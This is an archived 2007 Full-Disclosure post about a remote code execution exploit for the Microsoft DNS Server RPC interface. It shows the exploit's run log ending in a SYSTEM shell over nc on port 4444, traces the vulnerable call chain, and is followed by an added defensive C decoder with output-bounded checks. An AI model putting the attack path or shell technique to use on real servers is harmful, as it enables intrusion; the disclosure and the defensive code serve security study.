SECURITYVULNS:DOC:16708
History: Apr 16, 2007 - 12:00 a.m.

[Full-disclosure] Microsoft DNS Server Remote Code execution Exploit and analysis

2007-04-16 00:00:00
vulners.com

Hi,

I'm sending you the headers of the new exploit code for Microsoft DNS
servers. You can download the full source code exploit and analysis at:

Microsoft DNS Server Remote Code execution Exploit and analysis
Advisory: http://www.microsoft.com/technet/security/advisory/935964.mspx
This remote exploit works against port 445 (also Microsoft RPC api used)

Author:

Timeline:

  • April 12, 2007: Microsoft advisory published
  • April 13, 2007: POC exploit coded
  • April 14, 2007: Microsoft notified about a new attack vector against port
    445 (this exploit code)
  • April 14, 2007: Working exploit for Windows 2000 Server SP4 (Spanish)
  • April 15, 2007: Working exploit for Windows 2003 Server SP2 (Spanish), /GS
    bypassed
  • April 16, 2007: hackers hax the w0rld and got busted.
  • April xx, 2007: Lammer releases the first buggy worm
  • Xxxxx xx, 2007: Finally it was true. Naked photos of Gary m… being
    abducted were found at NSA servers

Usage:
D:\DNSTEST>dnstest.exe 192.168.1.7
-------------------------------------------------------
Microsoft Dns Server local & remote RPC Exploit code (port 445)
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2 (Spanish)
-------------------------------------------------------

[+] Trying to fingerprint target… 05 02
[+] Remote Host identified as Windows 2003
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_np:
192.168.1.7[\\pipe\\dnsserver]
[+] RpcBindingFromStringBinding returned 0x0
[+] Calling remote procedure DnssrvOperation()
[+] Now try to connect to port 4444

D:\DNSTEST>nc 192.168.1.7 4444
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
nt authority\system

Vulnerability Analysis:

The function Lookup_ZoneTreeNodeFromDottedName() uses a fixed local buffer
to convert a string by calling Name_ConvertFileNameToCountName(); this string
can contain backslash-octal characters. Although some bounds checks are done
when writing to the buffer, it is still possible to bypass them using a string
with multiple backslashed chars, resulting in a stack-based buffer overflow.

This function can be reached through the DNS RPC interface; the execution flow
will be as follows:

R_DnssrvQuery(pa,buggybuffer,pc,DesiredAccess,pd);                  // RPC exported function
  R_DnssrvQuery2(0,0,pa,buggybuffer,pc,DesiredAccess,pd);
    RpcUtil_FindZone(buggybuffer,1,DesiredAccess);
      Zone_FindZoneByName(buggybuffer);                             // Here we go!
        Lookup_ZoneTreeNodeFromDottedName(buggybuffer,0,0x2000000);
          Name_ConvertFileNameToCountName(localbuffer,buggybuffer,0); // Using fixed size local buffer
            extractQuotedChar(x,x,buggybuffer);                     // Extract octal number
Disassemblies at the end of the code:

References:

  • Defeating the Stack Based Buffer Overflow Prevention Mechanism of
    Microsoft Windows 2003 Server. (David Litchfield, NGSSoftware).
  • www.48bits.com
  • http://www.514.es

Just compile the code with nmake and have fun!

*/
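The analysis above describes a decoder that expands backslash-octal escapes into a fixed-size stack buffer and lets a run of escapes get past its bounds checks. The following is an added example, not the post's exploit and not the DNS server's own Name_ConvertFileNameToCountName() logic (which the post does not show). It assumes a simplified grammar of my own choosing: `\ooo` is three octal digits encoding one byte and `\c` is a literal `c`. The defensive point it demonstrates is that the capacity check must be measured in output bytes and must run before every single write, regardless of how many input characters the escape that produced that byte consumed; `escape_run_result()` feeds a constructed run of `\101` escapes against a 64-byte buffer to show that 64 fit and 65 are refused rather than written past the end.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example (not the post's exploit and not the DNS server's own
   Name_ConvertFileNameToCountName). Assumed grammar: "\ooo" is three octal
   digits encoding one byte, "\c" is a literal c; anything else is copied
   as-is. The defensive point: the capacity check is on the OUTPUT position
   and runs before every write, no matter how many input characters the
   escape that produced the byte consumed. */

static int octal_digit(char c)
{
    return c >= '0' && c <= '7';
}

/* Decodes `in` into `out` (capacity `out_cap`). Returns the number of bytes
   written, or -1 if the output would overflow, an escape value exceeds 255,
   or the string ends in a lone backslash. */
int decode_backslash_octal(const char *in, unsigned char *out, size_t out_cap)
{
    size_t o = 0;
    size_t i = 0;

    while (in[i] != '\0') {
        unsigned char byte;

        if (in[i] == '\\') {
            /* Short-circuit evaluation keeps us from reading past the NUL. */
            if (octal_digit(in[i + 1]) && octal_digit(in[i + 2]) &&
                octal_digit(in[i + 3])) {
                int v = (in[i + 1] - '0') * 64 + (in[i + 2] - '0') * 8 +
                        (in[i + 3] - '0');
                if (v > 255)
                    return -1;       /* "\400".."\777" do not fit a byte */
                byte = (unsigned char)v;
                i += 4;
            } else if (in[i + 1] != '\0') {
                byte = (unsigned char)in[i + 1];   /* "\c" -> literal c */
                i += 2;
            } else {
                return -1;           /* trailing lone backslash */
            }
        } else {
            byte = (unsigned char)in[i];
            i += 1;
        }

        /* The check that must guard every write: measured in output bytes. */
        if (o >= out_cap)
            return -1;
        out[o++] = byte;
    }
    return (int)o;
}

/* Constructed stress input: `count` copies of "\101" ('A') decoded into a
   64-byte buffer. Returns the decoder's result so callers can see that
   64 escapes fit and 65 are refused rather than written past the end. */
int escape_run_result(int count)
{
    char in[128 * 4 + 1];
    unsigned char out[64];

    if (count < 0 || count > 128)
        return -1;
    for (int k = 0; k < count; k++)
        memcpy(in + 4 * k, "\\101", 4);
    in[4 * count] = '\0';
    return decode_backslash_octal(in, out, sizeof out);
}

int main(void)
{
    unsigned char buf[64];
    int n = decode_backslash_octal("www\\056example", buf, sizeof buf);

    printf("decoded %d bytes: %.*s\n", n, n, (const char *)buf);
    printf("64 escapes -> %d, 65 escapes -> %d\n",
           escape_run_result(64), escape_run_result(65));
    return 0;
}
```

Compile with any C99 compiler (for example `cc -Wall decode.c`); the decoder never touches `out[o]` until it has confirmed `o < out_cap`, so the size of the escape run changes only whether the call returns -1, never how many bytes land on the stack.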